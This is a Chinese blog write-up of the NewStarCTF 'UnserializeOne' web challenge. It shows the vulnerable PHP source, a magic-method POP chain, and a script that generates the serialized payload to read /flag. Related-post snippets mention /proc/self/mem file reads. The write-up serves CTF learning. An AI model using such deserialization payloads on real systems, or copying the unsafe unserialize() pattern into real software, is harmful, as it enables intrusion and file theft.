NewStar CTF UnserializeOne

已于 2022-10-03 16:05:18 修改
阅读量1.2k 收藏
点赞数
分类专栏: buu刷题 php反序列化 文章标签: web安全
于 2022-10-03 15:59:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62260766/article/details/127152882
版权

一、源码

<?php
error_reporting(0);
highlight_file(__FILE__);
#Something useful for you : https://zhuanlan.zhihu.com/p/377676274
class Start{
    public $name;
    protected $func;

    public function __destruct()
    {
        echo "Welcome to NewStarCTF, ".$this->name;
    }

    public function __isset($var)
    {
        ($this->func)();
    }
}

class Sec{
    private $obj;
    private $var;

    public function __toString()
    {
        $this->obj->check($this->var);
        return "CTFers";
    }

    public function __invoke()
    {
        echo file_get_contents('/flag');
    }
}

class Easy{
    public $cla;

    public function __call($fun, $var)
    {
        $this->cla = clone $var[0];
    }
}

class eeee{
    public $obj;

    public function __clone()
    {
        if(isset($this->obj->cmd)){
            echo "success";
        }
    }
}

if(isset($_POST['pop'])){
    unserialize($_POST['pop']);
}

二、思路

纯新手,第一次接触这样的题,上网搜了搜,看了看。流程:Star.__destruct()->Sec.__tostring()->Easy.__call()->eeee.__clone()->Start.__isset()->Sec.__invoke()

一开始,啥都不会,就这样弄弄。结果出错,网上搜了一下,privare和protext要在类内部定义,所以改了一下。结果出现了无限循环。错误示范:public function __construct(){$this->xx=new 下一类},我就一直这样。然后在Start那里陷入循环了。然后就摆烂了。然后,这周别人的wp出来了,学习了一下。

这里要注意$this->cla = clone $var[0],前面已经把$b->var=$c了,所以此时,$this->cla=$c

三、代码

一:要在一开始就定义好,尽量别在类内部。避免进入循环。
二:可以把private改成public(看到的,虽然感觉不靠谱)

<?php
class Start{
	public $name;
    protected $func;
    public function __construct(){
        $this->func=new Sec();
    }

}
class Sec{
	private $obj;
    public $var;
	public function __construct() {
        $this->obj = new Easy();
    }
}
class Easy{
    public $cla;
}
class eeee{
    public $obj;

}
$a=new Start();
$b=new Sec();
$c=new eeee();
$c->obj=$a;
$a->name=$b;
$b->var=$c;


echo urlencode((serialize($a)));
?>

好难哦~~
参考:https://blog.csdn.net/trytowritecode/article/details/127058676

扯淡&
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
【网络安全 | CTF】catcat-new
等风来
12-25 2147
读取了/proc/self/maps获得了应用运行的内存映射信息,接下来的思路就是:读取/proc/self/mem获得当前内存的详细信息,由于在app.py的info()方法从HTTP请求中接收了start和end参数,即可传参,从而读取任意文件中任意两个地址之间的数据,最后使用正则表达式匹配字符串\w+{\w+}直接获取flag
NewStarCTF 2024 公开赛道 Week1,2024年最新阿里面试官
2401_84181309的博客
04-10 1099
from Crypto.Util.number import * from flag import flagdef gen_prime(n): res = 1for i in range(15): res *= getPrime(n)return resif name == ‘__main__’: n = gen_prime(32) e = 65537 m = bytes_to_long(flag) c = pow(m,e,n) print(n) print©使用风二西(风大)的轩禹RSA工具分解模数N,然
UnserializeOne
qq_64201116的博客
10-09 1284
_set() 用于将数据写入不可访问的属性 给一个未定义的属性赋值时,此方法会被触发,传递的参数是被设置的属性名和值 // 不存在赋值。__set_state(),调用var_export()导出类时,此静态方法会被调用。__isset(),当对不可访问属性调用isset()或empty()时调用。__isset() 在不可访问的属性上调用isset()或empty()触发。__unset(),当对不可访问属性调用unset()时被调用。__invoke(),调用函数的方式调用一个对象时的回应方法。
NewStarCTF 2024 公开赛道 Week1
最新发布
2401_85238540的博客
07-20 872
使用风二西(风大)的轩禹RSA工具分解模数N,然后计算私钥,计算明文,明文转字符即可获得flag。
[NewStarCTF 公开赛赛道]UnserializeOne
qq_20242529的博客
04-29 283
先将代码复制进vscode,然后把所有和属性无关的删除。将结果以POST请求传给参数POP。这里不知道魔术方法的功能可以看这两个链接。这道题的链路比较好复原,正向逆向都可以。正向复原,图画的比较丑,谅解一下。这道题是反序列pop类型的。
魔术方法总结
梦里不知身是客
12-26 9861
__construct(),类的构造函数 __destruct(),类的析构函数 __call(),在对象中调用一个不可访问方法时调用 __callStatic(),用静态方式中调用一个不可访问方法时调用 __get(),获得一个类的成员变量时调用 __set(),设置一个类的成员变量时调用 __isset(),当对不可访问属性调用isset()或empty()时调用 __unset(
[NewStarCTF 2023 公开赛道]Unserialize
qq_20242529的博客
04-29 249
PHP 序列化的时候 private和 protected 变量会引入不可见字符%00,private是%00类名%00属性名 ,protected为%00*%00属性名 ,注意这两个 %00就是 ascii 码0的字符。$cmd 是 private 属性的,赋值只能在内部赋值。浏览器输出的结果:O:4:"evil":1:{s:9:"evilcmd";要改为O:4:"evil":1:{s:9:"%00evil%00cmd";就是说上面的O:4:"evil":1:{s:9:"evilcmd";
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛中,可利用该工具自动识别编码类型并解码,快速解决misc类别的密码题目。 其他说明: 该工具具备智能判断密码...
ctf脚本_ctfpy脚本_ctf跑脚本_ctf_ctf脚本密码_
09-30
ctf 密码学 脚本 合集 非常 nice
CTF题库超详细资源合集
06-14
ctf题库 CTF 题⽬类型⼀般分为 Web 渗透、RE 逆向、Misc 杂项、PWN ⼆进制漏洞利⽤、Crypto 密码破译。 在传统的CTF线上⽐赛中,Web类题⽬是主要的题型之⼀,相较于⼆进制、逆向等类型的题⽬,参赛者不需掌握系统...
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
NewStarCTF2023week2-Unserialize?
Welcome To Myon'Blog !
10-15 6521
创建了一个 evil 对象并设置了 cmd 属性,然后对对象进行了序列化。但要注意,在 PHP 中,如果一个类包含私有属性,并且你尝试序列化该对象,私有属性的值将不会被包括在序列化结果中。因此,在反序列化时,你无法访问 cmd 属性的值,因为它不会被正确反序列化。定义了一个eval类,该类下有一个私有变量cmd和公有成员函数destruct(),该函数在对象的所有引用都被删除或类被销毁时会自动调用;如果满足if条件,没有被匹配到,则会调用system函数,执行我们传入的cmd内容;在根目录下找到flag。
NewStarCTF 2023 WEEK1 Crypto
qq_63577068的博客
10-02 642
key=16*8*2=256bit,iv=16*8=128bit,256^128bit说明key的高位128bit不变,所以通过xor高128bit得到高位key的值*2还原key,iv=key^xor^1。每一个明文异或key,得到密文。最主要是要知道key值,就能逆推明文,一种就是,已知明文头是“flag”,用0xe9^ord("f"),0xe3^ord("l")得到key=143。凯撒密码,已知flag的头,kqfl->flag 相当于向前移动5位,key=5,得到。Brainfuck解密。
NewStarCTF-WEEK1CRYPTO-RSA_begin题与解
villons的博客
09-25 620
rsa套娃题,奇怪的hint
NewStarCTF 2023 公开赛道 WEEK2|Crypto
qq_73643549的博客
10-11 1429
获取一组发现难以解密,所以考虑靶机特性,因为是对同一个明文加密,所以我们。但是看到题目只解一半,也就说m > q,即k4 < 0, 所以h就是我们要求取的系数。因此可以使用广播攻击(见题,如果关注到题目含义就能很快反应,笔者是崩溃的过程中提出为什么给我这么恶心的靶机才意识到的)。根据加密过程,我们知道这里应该采取费马费解法,所以我们可以把n丢到yafu中去,可以获取得到两个因子。好好分析还是挺简单的,因为只需要搞清楚h是什么就可以了。知道(p,q)后,我们就可以破解RSA了。,我们提取出(p-1)。
2022 七校联合NewStarCTF 公开赛赛道 WEEK1|CRYPTO
zerorzeror的博客
10-01 940
2022 七校联合NewStarCTF 公开赛赛道 WEEK1|CRYPTO
【buuctfNewStarCTF 公开赛赛道 web:Word-For-You、NotPHP
weixin_46497491的博客
09-22 2133
【buuctfNewStarCTF 公开赛赛道 web:Word-For-You、NotPHP
NewStarCTF 2024 公开赛道 Week1,2024年最新31道网络安全面试题
2401_83946722的博客
04-13 1001
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
萌新赛(NewStar)
qq_62046696的博客
10-04 1059
如有侵权,请联系我,立即删除。最近的这个“萌新”,赛感觉很有必要记录一下。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值